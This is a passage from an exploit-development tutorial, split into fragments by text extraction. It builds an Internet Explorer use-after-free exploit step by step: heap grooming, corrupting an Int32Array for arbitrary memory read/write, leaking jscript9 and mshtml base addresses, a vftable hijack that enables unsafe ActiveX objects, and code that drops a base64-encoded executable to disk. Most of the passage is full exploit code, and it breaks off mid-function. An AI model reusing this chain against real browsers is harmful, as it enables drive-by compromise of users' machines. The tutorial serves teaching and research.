mshtml + 0x22100c
 and let’s see what happe
ns:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 446 
-
 
 
Wonderful! 
ESI
 points to our object (
0x61
 is the code point for the character ‘
a
‘) and now we can take control 
of the executio
n flow. Our goal is to reach and control an instruction so that it writes 
0x20
 at the address 
0x0c0af01b
. You should know this address by heart by now!
 
You might be wondering why we assign a string to the 
className
 property of a 
DOM element
. Note that we 
d
on’t just write
 
var str = new Array(416).join("a");
 
When we assign the string to 
elem.className
, the string is copied and the copy is assigned to the property 
of the DOM element. It turns out that the copy of the string is allocated on the same heap where 
the object 
which was freed due to the UAF bug resided. If you try to allocate, for instance, an 
ArrayBuffer
 of 
0x340
 
bytes, it won’t work, because the raw buffer for the 
ArrayBuffer
 will be allocated on another heap.
 
Controlling the execution flow
 
The next
 step is to see if we can reach a suitable instruction to write to memory at an arbitrary address 
starting from the crash point. Once again, we’ll use 
IDA
. I can’t stress enough how useful IDA is.
 
We determined the address of the crash point to be 
mshtml +
 0x22100c
. This means that we need to 
disassemble the library 
mshtml.dll
. Let’s find the path:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 447 
-
 
0:016> lmf m mshtml
 
start    end        module name
 
6b6e0000 6c491000   MSHTML   C:
\
Windows
\
system32
\
MSHTML.dll
 
Now let’s open that 
.dll
 in IDA and, when asked, 
allow IDA to load 
symbols
 from the 
Microsoft server
. Let’s 
go to 
View
→
Open subviews
→
Segments
. From there we can determine the base address of 
mshtml
:
 
 
As we can see, the base address is 
0x63580000
. No
w close the 
Program Segmentation
 tab, press 
g
 and 
enter 
0x63580000+0x22100c
. You should find yourself at the crash location.
 
Let’s start with the analysis:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 448 
-
 
The value of 
[esi+98h]
 must be non 0 because our string can’t contain null wchars (they would terminate the 
string prematurely, being the string null
-
terminated). Because of this, the execution reaches the second 
node where 
[esi+1
a4h]
 is compared with 
15f90h
. We can choose
 [esi+1a4h] = 11111h
 so that the third node 
is skipped and a crash is easily avoided, but we could also set up things so that 
[eax+2f0h]
 is writable.
 
Now let’s look at the function 
?UpdateMarkupContentsVersion
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 449 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 4
50 
-
 
 
The picture should be clear enough. Anyway, there’s an important point to understand. We know that the 
Int32Array
 whose length we want to modify is at address 
0xc0af000
, but we don’t control the values at that 
address. We know, however, that the value at
 
0xc0af01c
 is the address of the raw buffer associated with the 
Int32Array
. Note that we don’t know the address of the raw buffer, but we know that we can find that 
address at 
0xc0af01c
. Now we must make sure that the dword at offset 
1c0h
 in the raw buffer
 is 
0
. 
Unfortunately, the raw buffer is only 
0x58
 bytes. Remember that we can’t allocate a bigger raw buffer 
because it must have the exact same size of a 
LargeHeapBlock
. But there is an easy solution: allocate more 
raw buffers!
 
Let’s summarize our memory 
layout:
 
Object size = 0x340 = 832
 
offset: value
 
   94h: 0c0af010h
 
        (X = [obj_addr+94h] = 0c0af010h ==> Y = [X+0ch] = raw_buf_addr ==> [Y+1c0h] is 0)
 
  0ach: 0c0af00bh
 
        (X = [obj_addr+0ach] = 0c0af00bh ==> inc dword ptr [X+10h] ==> inc dword p
tr [0c0af01bh])
 
  
1a4h: 11111h
 
        (X = [obj_addr+1a4h] = 11111h < 15f90h)
 
We need to make several changes to our html file.
 
First, we add the code for triggering the UAF bug and taking control of the execution flow:
 
JavaScript
 
 
function
 
getFiller
(
n
)
 
{
 
    
return
 
new
 
Array
(
n
+
1
).
join
(
"a"
);
 
  
}
 
  
function
 
getDwordStr
(
val
)
 
{
 
    
return
 
String
.
fromCharCode
(
val
 
%
 
0x10000
,
 
val
 
/
 
0x10000
);
 
  
}
 
  
function
 
handler
()
 
{
 
    
this
.
outerHTML
 
=
 
this
.
outerHTML
;
 
 
// Object size = 0x340 = 832
 
    
// offset: value
 
    
//    94h: 0c0af010h
 
    
//         (X = [obj_addr+94h] = 0c0af010h ==> Y = [X+0ch] = raw_buf_addr ==> [Y+1c0h] is 0)
 
    
//   0ach: 0c0af00bh
 
    
//         (X = [obj_addr+0ach] = 0c0af00bh ==> inc dword ptr [X+10h] ==> inc dword ptr [0c0af01bh])
 
    
//   1a4h: 11111h
 
    
//         (X = [obj_addr+1a4h] = 11111h < 15f90h)
 
    
elem
 
=
 
document
.
createElement
(
"div"
);
 
    
elem
.
className
 
=
 
getFiller
(
0x94
/
2
)
 
+
 
getDwordStr
(
0xc0af010
)
 
+
 
                     
getFiller
((
0xac
 
-
 
(
0x94
 
+
 
4
))/
2
)
 
+
 
getDwordStr
(
0xc0af0
0b
)
 
+
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 451 
-
 
                     
getFiller
((
0x1a4
 
-
 
(
0xac
 
+
 
4
))/
2
)
 
+
 
getDwordStr
(
0x11111
)
 
+
 
                     
getFiller
((
0x340
 
-
 
(
0x1a4
 
+
 
4
))/
2
 
-
 
1
);
        
// 
-
1 for string
-
terminating null wchar
 
  
}
 
  
function
 
trigger
()
 
{
 
      
var
 
a
 
=
 
document
.
getElementsB
yTagName
(
"script"
)[
0
];
 
      
a
.
onpropertychange
 
=
 
handler
;
 
      
var
 
b
 
=
 
document
.
createElement
(
"div"
);
 
      
b
 
=
 
a
.
appendChild
(
b
);
 
  
}
 
 
Next, we must create 
4
 more 
ArrayBuffer
, as we’ve already discussed:
 
JavaScript
 
 
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte hea
der | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
   
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf2)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf3)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf4)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf5)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
   
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x300
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x100
)
 
{
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
        
// must be exactly 0x58!
 
        
buf2
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
    
buf3
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
        
buf4
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
        
buf5
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
      
}
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
     
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
 
Having added 
4
 more 
ArrayBuffers
, we also need to fix the code which computes the address of the first raw 
buffer:
 
JavaScript
 
 
// This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 452 
-
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 0
0000000 00000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
 
    
// ... we added four more raw buffers ...
 
    
//
 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c00
0000
 
    
// 03c1f238: ...
 
 
// We check that the structure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
*
5
/
4
],
 
        
vftptr2
 
=
 
int32ar
ray
[
0x60
*
6
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
7
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
*
5
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
6
+
0x24
)/
4
],
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
7
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
//      alert("Error 1!");
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
6
;
 
 
Basically, we changed 
int32array[0x60*N/
4]
 into 
int32array[0x60*(N+4)/4]
 to account for the additional 
4
 raw 
buffers after the original raw buffer. Also, the last line was
 
buf_addr = nextPtr1 
-
 0x60*2
 
and has been changed to
 
buf_addr = nextPtr1 
-
 0x60*(2+4)
 
for the same reason.
 
I noticed that so
metimes 
SaveToFile
 fails, so I decided to force the page to reload when this happens:
 
JavaScript
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.S
tream"
);
 
      
GodModeOff
();
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 453 
-
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in the
 tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0
000005c
);
   
// '
\
'
 
      
try
 
{
 
        
bStream
.
SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
      
tStream
.
Close
();
 
      
bStream
.
Close
();
 
      
return
 
1
;
 
    
}
 
    
.
 
    
.
 
    
.
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
//      alert("SaveToFile failed");
 
      
window
.
location
.
reload
();
 
      
return
 
0
;
 
    
}
 
 
Here’s the full code:
 
JavaScript
 
 
<
html
>
 
<
head
>
 
<
script
 
language
=
"javascript"
>
 
  
function
 
getFille
r
(
n
)
 
{
 
    
return
 
new
 
Array
(
n
+
1
).
join
(
"a"
);
 
  
}
 
  
function
 
getDwordStr
(
val
)
 
{
 
    
return
 
String
.
fromCharCode
(
val
 
%
 
0x10000
,
 
val
 
/
 
0x10000
);
 
  
}
 
  
function
 
handler
()
 
{
 
    
this
.
outerHTML
 
=
 
this
.
outerHTML
;
 
 
// Object size = 0x340 = 832
 
    
// offset: va
lue
 
    
//    94h: 0c0af010h
 
    
//         (X = [obj_addr+94h] = 0c0af010h ==> Y = [X+0ch] = raw_buf_addr ==> [Y+1c0h] is 0)
 
    
//   0ach: 0c0af00bh
 
    
//         (X = [obj_addr+0ach] = 0c0af00bh ==> inc dword ptr [X+10h] ==> inc dword ptr [0c0af01bh])
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 454 
-
 
    
//   1a4h: 11111h
 
    
//         (X = [obj_addr+1a4h] = 11111h < 15f90h)
 
    
elem
 
=
 
document
.
createElement
(
"div"
);
 
    
elem
.
className
 
=
 
getFiller
(
0x94
/
2
)
 
+
 
getDwordStr
(
0xc0af010
)
 
+
 
                     
getFiller
((
0xac
 
-
 
(
0x94
 
+
 
4
))/
2
)
 
+
 
getDwordStr
(
0xc
0af00b
)
 
+
 
                     
getFiller
((
0x1a4
 
-
 
(
0xac
 
+
 
4
))/
2
)
 
+
 
getDwordStr
(
0x11111
)
 
+
 
                     
getFiller
((
0x340
 
-
 
(
0x1a4
 
+
 
4
))/
2
 
-
 
1
);
        
// 
-
1 for string
-
terminating null wchar
 
  
}
 
  
function
 
trigger
()
 
{
 
      
var
 
a
 
=
 
document
.
getEleme
ntsByTagName
(
"script"
)[
0
];
 
      
a
.
onpropertychange
 
=
 
handler
;
 
      
var
 
b
 
=
 
document
.
createElement
(
"div"
);
 
      
b
 
=
 
a
.
appendChild
(
b
);
 
  
}
 
 
(
function
()
 
{
 
//    alert("Starting!");
 
    
CollectGarbage
();
 
 
//
-------------------------------------
----------------
 
    
// From one
-
byte
-
write to full process space read/write
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
  
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf2)
 
    
// 8
-
byte header | 0x58
-
byte
 ArrayBuffer (buf3)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf4)
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf5)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x300
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x100
)
 
{
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
        
// must be exactly 0x58!
 
        
buf2
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
        
buf3
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
        
buf4
 
=
 
n
ew
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
        
buf5
 
=
 
new
 
ArrayBuffer
(
0x58
);
       
// must be exactly 0x58!
 
      
}
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDataHead
 
    
//   0x20:  arra
y[0] address
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 455 
-
 
    
//   0x24:  array[1] address
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
fo
r
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                           
  array_len buf_addr
 
    
//          jsArrayBuf
 
    
// We increment the highest byte of array_len 20 times (which is equivalent to writing 0x20).
 
    
for
 
(
var
 
k
 
=
 
0
;
 
k
 
<
 
0x20
;
 
++
k
)
 
      
trigger
();
 
    
// Now let's find the Int32Array whose length we 
modified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x300
;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
bre
ak
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
//      alert("Can't find int32array!");
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
 
    
// This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// The next Lar
geHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00
000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
 
    
// ... we added four more raw buffers ...
 
    
// 03c1f1d8: 70796e18
 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c000000
 
    
// 03c1f23
8: ...
 
 
// We check that the structure above is correct (we check the first LargeHeapBlocks).
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 456 
-
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
*
5
/
4
],
 
        
vftptr2
 
=
 
int32array
[
0x60
*
6
/
4
],
 
    
vftptr3
 
=
 
int32array
[
0x60
*
7
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
*
5
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
6
+
0x24
)/
4
],
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
7
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftpt
r3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
//      alert("Error 1!");
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
6
;
 
    
// Now we modify int32array again to gain full addr
ess space read/write access.
 
    
if
 
(
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
//      alert("Error 2!");
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af000
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new lengt
h
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
int32array
[
address
/
4
];
 
      
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
function
 
write
(
address
,
 
value
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
int32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
  
// 0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
        
int32array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 457 
-
 
    
}
 
    
//
---------
 
    
// God mode
 
    
//
---------
 
    
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
jscript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
  
// Now we need to determine the base address of MSHTML. We can create an HTML
 
    
// object and write its reference to the address 0x0c0af000
-
4 which corresponds
 
    
// to the last element of one of our arrays.
 
    
// Let's find the array at 0x0c0af
000
-
4.
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 3 in the last position of one of our arrays. IE encodes the number x
 
    
// as 2*x+1 so that it can tell addresses (dword aligned) and numbers apart.
 
    
/
/ Either we use an odd number or a valid address otherwise IE will crash in the
 
    
// following for loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
leakArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leakArray
 
==
 
0
)
 
{
 
//      alert("Can't find leakArray!");
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3bf7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
,
 
obj
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00000000 00000003
 
    
//   73b38b
9a 00000000 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
//                          
                        vftable
 
    
//                                    +
-----
> +
------------------
+
 
    
//                                    |       |                  |
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 458 
-
 
    
//                                    |       |                  |
 
    
//     
                               |  0x10:| jscript9+0x10705e| 
--
> "XCHG EAX,ESP | ADD EAX,71F84DC0 |
 
    
//                                    |       |                  |      MOV EAX,ESI | POP ESI | RETN"
 
    
//                                    |  0x14:|
 jscript9+0xdc164 | 
--
> "LEAVE | RET 4"
 
    
//                                    |       +
------------------
+
 
    
//                 object             |
 
    
// EAX 
---
> +
-------------------
+     |
 
    
//          | vftptr            |
-----
+
 
    
//       
   | jscript9+0x15f800 | 
--
> "XOR EAX,EAX | RETN"
 
    
//          | jscript9+0xf3baf  | 
--
> "XCHG EAX,EDI | RETN"
 
    
//          | jscript9+0xdc361  | 
--
> "LEAVE | RET 4"
 
    
//          +
-------------------
+
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God Mode On!
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God Mode Off!
 
 
addr
 
=
 
get_addr
(
ActiveXObject
);
 
    
var
 
pp_obj
 
=
 
read
(
read
(
addr
 
+
 
0x28
)
 
+
 
4
)
 
+
 
0x1f0
;
       
// ptr to ptr to object
 
    
var
 
old_objptr
 
=
 
read
(
pp_obj
);
 
    
var
 
old_vftptr
 
=
 
read
(
old_objptr
);
 
    
// Create the new vftable.
 
    
var
 
new_vftable
 
=
 
new
 
Int32Array
(
0x708
/
4
);
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
new_vftable
.
length
;
 
++
i
)
 
      
new_vftable
[
i
]
 
=
 
read
(
old_vftptr
 
+
 
i
*
4
);
 
    
new_vftable
[
0x10
/
4
]
 
=
 
jscript9
+
0x10705e
;
 
    
new_vftable
[
0x14
/
4
]
 
=
 
jscript9
+
0xdc164
;
 
    
var
 
new_vftptr
 
=
 
read
(
get_addr
(
new_vftable
)
 
+
 
0x1c
);
        
// ptr to raw buffer of new_vftable
 
    
// Create the new object.
 
    
var
 
new_object
 
=
 
new
 
Int32Array
(
4
);
 
    
new_object
[
0
]
 
=
 
new_vftptr
;
 
    
new_object
[
1
]
 
=
 
jscript9
 
+
 
0x15f800
;
 
    
new_object
[
2
]
 
=
 
jscript9
 
+
 
0xf3baf
;
 
    
new_object
[
3
]
 
=
 
jscript9
 
+
 
0xdc361
;
 
    
var
 
new_objptr
 
=
 
read
(
get_addr
(
new_object
)
 
+
 
0x1c
);
         
// ptr to raw buffer of new_object
 
    
function
 
GodModeOn
()
 
{
 
      
write
(
pp_obj
,
 
new_objptr
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
pp_obj
,
 
old_objptr
);
 
    
}
 
    
// content of exe file encoded in base64
.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAAA <snipped> 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADO
DB.Stream"
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 459 
-
 
      
GodModeOff
();
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in
 the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
try
 
{
 
        
bStream
.
SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
      
tStream
.
Close
();
 
      
bStream
.
Close
();
 
      
return
 
1
;
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window
.
atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
fo
r
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data
.
length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data
.
charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data
.
charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr
.
push
(
String
.
fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr
.
join
(
''
